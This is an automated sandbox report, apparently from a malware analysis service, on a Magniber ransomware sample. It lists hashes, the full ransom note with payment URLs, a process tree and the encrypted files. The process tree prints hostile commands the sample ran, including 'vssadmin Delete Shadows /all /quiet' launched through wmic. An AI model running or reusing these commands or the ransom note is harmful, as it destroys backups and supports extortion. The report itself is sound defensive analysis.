Resubmissions

23-08-2021 16:26

210823-tx5an7s74s 10

18-08-2021 20:35

210818-2gkvb49v8e 10

22-07-2021 19:24

210722-68c2armfnx 10

Analysis

  • max time kernel
    101s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    18-08-2021 20:35

General

  • Target

    magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe

  • Size

    21KB

  • MD5

    4160c35d3c600712b528e8072de1bc58

  • SHA1

    12c822103678fed7b928f0202eb7e51714ab3b56

  • SHA256

    f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675

  • SHA512

    f722f7a5560641b0cbeb73dfb9d495cf2920858acfdcd5806f619256f2810569486be00eee4547b07298ca20c18d478f3f567809a7b2ff9cf81519e057a3a962

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here:
http://1e4c82580c14c040c0lqcsthxnw.ndkeblzjnpqgpo5o.onion/lqcsthxnw
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://1e4c82580c14c040c0lqcsthxnw.wonride.site/lqcsthxnw
http://1e4c82580c14c040c0lqcsthxnw.lognear.xyz/lqcsthxnw
http://1e4c82580c14c040c0lqcsthxnw.lieedge.casa/lqcsthxnw
http://1e4c82580c14c040c0lqcsthxnw.bejoin.space/lqcsthxnw
Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://1e4c82580c14c040c0lqcsthxnw.ndkeblzjnpqgpo5o.onion/lqcsthxnw

http://1e4c82580c14c040c0lqcsthxnw.wonride.site/lqcsthxnw

http://1e4c82580c14c040c0lqcsthxnw.lognear.xyz/lqcsthxnw

http://1e4c82580c14c040c0lqcsthxnw.lieedge.casa/lqcsthxnw

http://1e4c82580c14c040c0lqcsthxnw.bejoin.space/lqcsthxnw

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1132
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1704
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://1e4c82580c14c040c0lqcsthxnw.wonride.site/lqcsthxnw^&1^&40439685^&61^&307^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://1e4c82580c14c040c0lqcsthxnw.wonride.site/lqcsthxnw&1&40439685&61&307&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1940 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1564
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      PID:568
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        PID:1912
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1240
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:616
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:668
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1288
    • C:\Users\Admin\AppData\Local\Temp\magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe
      "C:\Users\Admin\AppData\Local\Temp\magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2028
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        PID:956
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          PID:748
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:536
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1480
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      PID:2008
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1632
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1252
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:896
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:568
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:920
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:864
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1624
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1392
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1080
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:748
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:572
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    • Suspicious use of WriteProcessMemory
    PID:2008
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1796
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1032
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-66000939-353657841131837072516511139381016668511-685266239-53052034060588091"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:956
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:1420
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k swprv
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1912

                    Network

                    MITRE ATT&CK Enterprise v6

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V13U08N9\favicon[2].ico

                      MD5

                      8a80554c91d9fca8acb82f023de02f11

                      SHA1

                      5f36b2ea290645ee34d943220a14b54ee5ea5be5

                      SHA256

                      ca3d163bab055381827226140568f3bef7eaac187cebd76878e0b63e9e442356

                      SHA512

                      ca4b6defb8adcc010050bc8b1bb8f8092c4928b8a0fba32146abcfb256e4d91672f88ca2cdf6210e754e5b8ac5e23fb023806ccd749ac8b701f79a691f03c87a

                    • C:\Users\Admin\Desktop\ClearLimit.vsd.lqcsthxnw

                      MD5

                      809091a01d271f7210714ac759b04732

                      SHA1

                      394953a7012de04c6c7045706b3cdf8860278bb2

                      SHA256

                      8060b55528bcc794397acc083194620c0650af7c81335ace39b8ad9cbcbcab9e

                      SHA512

                      cfd462d02e367d8e0e432f56c85dc8ab160b37ec67e2ce98471b565f6353727edd95cc6dd9282fcce604d87ded254ebdbf8036f76dcdecfd5f8b6a6725388027

                    • C:\Users\Admin\Desktop\CloseSearch.wav.lqcsthxnw

                      MD5

                      95bcd65dda4a67795d7f99466118bb07

                      SHA1

                      d574b0c1659e334ca9d12fde83919d4a6ab21ee6

                      SHA256

                      7acb0605ed010b1f7f00d1859c951499505d3cfab1b7f4d12e28350d0a3a9145

                      SHA512

                      791325e308ef885c19413fea46882ef28ad5142f1815126ac3b5829ac725a22bfa05f9a4e3c36354a9a21935eb6a9a18d506b55099957659873c872d39187806

                    • C:\Users\Admin\Desktop\ConvertFromSwitch.vsdx.lqcsthxnw

                      MD5

                      45da7409212f2d3adfc155efe1e4655c

                      SHA1

                      511ec00a6aed027853a487f2b0f2c58fb7d3d7f5

                      SHA256

                      64f395a4411b5d56a0d7bebb37053dee0f6407155176a8034965ed89254eb4d2

                      SHA512

                      cddc4131793cdb891f02e31aa9be58c30df109a4314c3b6de0d9336b99c6a6d1152a92b0e3e920619f0d8d28ec57c9ebf136345fceb8d4085fe1f8143307ccd7

                    • C:\Users\Admin\Desktop\ConvertToFormat.tif.lqcsthxnw

                      MD5

                      7aac956d6f538054ea41ff2465abc24b

                      SHA1

                      6b59affd4a06f1e33907a7e89badbded90499236

                      SHA256

                      978c3fb3d393d144fc25fd4d1e6d393cfb0567d8cd96155efcfdff6cc51b1c39

                      SHA512

                      0097076121f8ba20593bd6d7503c94077cfddf7af4fca18bfc0cb80be7d4a9797641ece3ded7729bde7623cc76e402d215ceab367acf7ac96bb42f90b695fcad

                    • C:\Users\Admin\Desktop\GrantResize.tiff.lqcsthxnw

                      MD5

                      ae9f7b0140b29693caa38daa321af92b

                      SHA1

                      2c2ec36ef0e619124c118d7cb819f2e4c1fec2bb

                      SHA256

                      924d7c1d62f3a6ca5e68e75667b347d04c4b99d16fc3b9c3df910dcdecfc3459

                      SHA512

                      595bf0f177b7dbe41f9e59307bb5ffa53db16ea293c7ebf62d5586eb7c920f854629318db3bf348a5c9545c8756676c92cde2ae3677c7ce7be08423d25c8245e

                    • C:\Users\Admin\Desktop\InvokeCheckpoint.potm.lqcsthxnw

                      MD5

                      0ecfc3765069fcf87bf8f86208ee9d48

                      SHA1

                      e948f56c748415893a639cdd66db90ab5bd42fde

                      SHA256

                      5c8ca7283a7a977ffc4dcd56f5b75ef83304d29af33a11522bc29f5ebd140117

                      SHA512

                      0b632e4b2b04f2f8bb2431526ecef4371189c88a057a15ccc38f7facb411e27bd6fdfd3a4951003cda723e6e033c5d70e4889c9992ab73cbe2bca0cd99f96162

                    • C:\Users\Admin\Desktop\RequestFormat.wmv.lqcsthxnw

                      MD5

                      b5cbd9ac4e33f364b9d78dd3ce89a372

                      SHA1

                      6dc969a9270669cd36460da3539bbf123e29ff4c

                      SHA256

                      3af1029f5823884114f2c32bb07f477cbdbb31362c460653cca30f598f3fd070

                      SHA512

                      b93228c04e037c2d48c7f8daf1db7c9d7f425d6d4638bc7a1732479bb6f24412e2b4608683eda0741504c2c9f0daa13134e60d645562c43537359ec77638eeeb

                    • C:\Users\Admin\Desktop\TestWrite.rar.lqcsthxnw

                      MD5

                      dbe33125b5105c93d6ac5e3609f00b42

                      SHA1

                      aaf4a076aa4750ae3408a35f077b5da70b0bf98c

                      SHA256

                      086263da6a206ed9223a3aae2fe646d2450cd32b5b769d51f71222d3307203d6

                      SHA512

                      aa40bd73bea289229650af25fb1cda9301dd290a5f3a4ab71d5f6914a27661af6a15f84c1066cc87b7ae9ce94d85baed0f2800b14a223370597b6d0a1ba56e4b

                    • C:\Users\Admin\Desktop\UnlockMeasure.xlsb.lqcsthxnw

                      MD5

                      4ec01417813244e241d4056eebfdf92d

                      SHA1

                      19b0c54add6bfa17d0faefedc880618ca0d9f387

                      SHA256

                      105bf52c0bf9ce02e2154c40c5d098ef7b781ca485d4498399c56378dfc0492a

                      SHA512

                      502127937e32354720f683076e88f28617959daab5e4ee225cfc8d07df03e858bf71af67cdc6df8592f033e13fae3ac2585ec4d30e61202d1a3c4faa4c9ae854

                    • C:\Users\Admin\Desktop\UnregisterPublish.vstx.lqcsthxnw

                      MD5

                      20632246c7f887269bb969fcf584a2d9

                      SHA1

                      9b37a33496775cda99d8b25f99db102e73471d8c

                      SHA256

                      c0ce1e1d97b46bcf09c45f88b31945743991a1e5b3bbc1776a7d7e2ecc910e70

                      SHA512

                      8dd51e78e03953b478d44a67da3bdb39a0caa9a9304046fe1f75b4840b69d36c13b03e7966fe1f26de3a3dd1687fe12adf3033abb7faa4ab2881f611bfdf868c

                    • C:\Users\Admin\Desktop\WaitTest.crw.lqcsthxnw

                      MD5

                      2108fdd8f165e665608085cbcb26e8e0

                      SHA1

                      e125bd3ce945aa3798f1810ad889e952497ea789

                      SHA256

                      b0033258096349d35f58fa0fc657747309744f7dd79595c7500e777416f78719

                      SHA512

                      cc9d21d06a236bebf3a58391f1b3db71f1c65ac0d336fa8a3e57f778825dff873f62245eff15a5dfdd6e2ce4a3f74040aef09d47c6b3fad261789a5bcecaf2a3

                    • C:\Users\Admin\Desktop\readme.txt

                      MD5

                      ff51cecb4b45e5c3d59b43666c8e4988

                      SHA1

                      97d3ca72da3994e2247f66985488dfe3d1e9722f

                      SHA256

                      17436aa9d9c80654c42e915bae9e2de672831b0c40e8776f532fcb3582f7abd7

                      SHA512

                      80231753b1e9703378db709c434d0963c3ea4b1b6442be6ecf950aaf8b46ecf742058a4572330032502bd7e3938c03a6f592b8a775eddea4f285be6ddcc5acfe

                    • C:\Users\Public\readme.txt

                      MD5

                      ff51cecb4b45e5c3d59b43666c8e4988

                      SHA1

                      97d3ca72da3994e2247f66985488dfe3d1e9722f

                      SHA256

                      17436aa9d9c80654c42e915bae9e2de672831b0c40e8776f532fcb3582f7abd7

                      SHA512

                      80231753b1e9703378db709c434d0963c3ea4b1b6442be6ecf950aaf8b46ecf742058a4572330032502bd7e3938c03a6f592b8a775eddea4f285be6ddcc5acfe

                    • memory/536-96-0x0000000000000000-mapping.dmp

                    • memory/568-79-0x0000000000000000-mapping.dmp

                    • memory/568-113-0x0000000000000000-mapping.dmp

                    • memory/616-91-0x0000000000000000-mapping.dmp

                    • memory/668-95-0x0000000000000000-mapping.dmp

                    • memory/748-98-0x0000000000000000-mapping.dmp

                    • memory/748-110-0x0000000000000000-mapping.dmp

                    • memory/864-105-0x0000000000000000-mapping.dmp

                    • memory/896-103-0x0000000000000000-mapping.dmp

                    • memory/956-97-0x0000000000000000-mapping.dmp

                    • memory/1080-104-0x0000000000000000-mapping.dmp

                    • memory/1132-72-0x0000000000210000-0x0000000000214000-memory.dmp

                      Filesize

                      16KB

                    • memory/1164-76-0x0000000000000000-mapping.dmp

                    • memory/1564-100-0x0000000000000000-mapping.dmp

                    • memory/1564-102-0x0000000074FB1000-0x0000000074FB3000-memory.dmp

                      Filesize

                      8KB

                    • memory/1564-114-0x0000000000C40000-0x0000000000C42000-memory.dmp

                      Filesize

                      8KB

                    • memory/1624-111-0x0000000000000000-mapping.dmp

                    • memory/1632-112-0x0000000000000000-mapping.dmp

                    • memory/1704-74-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

                      Filesize

                      8KB

                    • memory/1704-73-0x0000000000000000-mapping.dmp

                    • memory/1912-93-0x0000000000000000-mapping.dmp

                    • memory/1940-92-0x0000000000000000-mapping.dmp

                    • memory/2008-99-0x0000000000000000-mapping.dmp

                    • memory/2012-94-0x0000000000000000-mapping.dmp

                    • memory/2028-66-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2028-62-0x00000000000F0000-0x00000000000F1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2028-63-0x0000000000100000-0x0000000000101000-memory.dmp

                      Filesize

                      4KB

                    • memory/2028-64-0x0000000000110000-0x0000000000111000-memory.dmp

                      Filesize

                      4KB

                    • memory/2028-65-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2028-60-0x0000000000020000-0x0000000000025000-memory.dmp

                      Filesize

                      20KB

                    • memory/2028-109-0x0000000001FC0000-0x0000000001FC1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2028-67-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2028-68-0x0000000001D00000-0x0000000001D01000-memory.dmp

                      Filesize

                      4KB

                    • memory/2028-69-0x0000000001D10000-0x0000000001D11000-memory.dmp

                      Filesize

                      4KB

                    • memory/2028-70-0x0000000001D20000-0x0000000001D21000-memory.dmp

                      Filesize

                      4KB

                    • memory/2028-71-0x0000000001D30000-0x0000000001D31000-memory.dmp

                      Filesize

                      4KB

                    • memory/2028-61-0x00000000000E0000-0x00000000000E1000-memory.dmp

                      Filesize

                      4KB